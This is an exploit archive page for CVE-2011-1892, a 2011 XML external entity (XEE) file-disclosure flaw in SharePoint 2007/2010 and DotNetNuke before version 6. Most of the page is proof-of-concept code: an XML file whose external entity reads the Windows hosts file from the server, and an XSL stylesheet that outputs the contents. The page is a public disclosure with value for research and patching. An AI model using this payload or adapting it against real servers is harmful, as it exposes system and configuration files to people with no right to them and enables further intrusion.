Skip to content
cyberexploits
webappwindowstext

SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

Published on 2011-09-20

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/webapps/17873.txt7eac4c3a
raw
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke

Date: September 15, 2011

Author: Nicolas Gregoire

Version: SharePoint 2007 / 2010, DotNetNuke < 6

CVE : CVE-2011-1892



poc filename: xee.xml



<!DOCTYPE doc [

<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">

]>

<doc>&boom;</doc>



poc filename: xee.xsl



<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

        <xsl:template match="/">

        <xsl:apply-templates/>

                <xsl:value-of select="doc"/>

        </xsl:template>

</xsl:stylesheet>



View on GitHub